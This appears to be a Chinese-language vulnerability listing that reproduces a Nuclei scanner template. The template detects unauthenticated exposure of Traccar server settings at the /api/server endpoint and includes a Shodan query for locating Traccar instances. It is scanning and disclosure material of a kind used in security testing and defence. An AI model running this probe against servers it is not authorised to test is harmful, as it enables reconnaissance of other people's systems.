traccar-settings-disclosure: Traccar Server Settings - Disclosure

日期: 2025-08-01 | 影响软件: Traccar | POC: 已公开

漏洞描述

Traccar exposes server settings at the /api/server endpoint without authentication.

PoC代码[已公开]

id: traccar-settings-disclosure

info:
  name: Traccar Server Settings - Disclosure
  author: DhiyaneshDk
  severity: low
  description: |
    Traccar exposes server settings at the /api/server endpoint without authentication.
  reference:
    - https://www.traccar.org/api-reference/
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Traccar"
  tags: traccar,disclosure,unauth,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/server"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"version":'
          - '"forceSettings":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220764f363cee24167b2848e0464072d69373cbfd9e77a12757a23615358339f3ee0220057d2206d491e3fd27098d93d375baf6c5174ef9de4b0aa27924f939fae75195:922c64590222798bb761d5b6d8e72950

相关漏洞推荐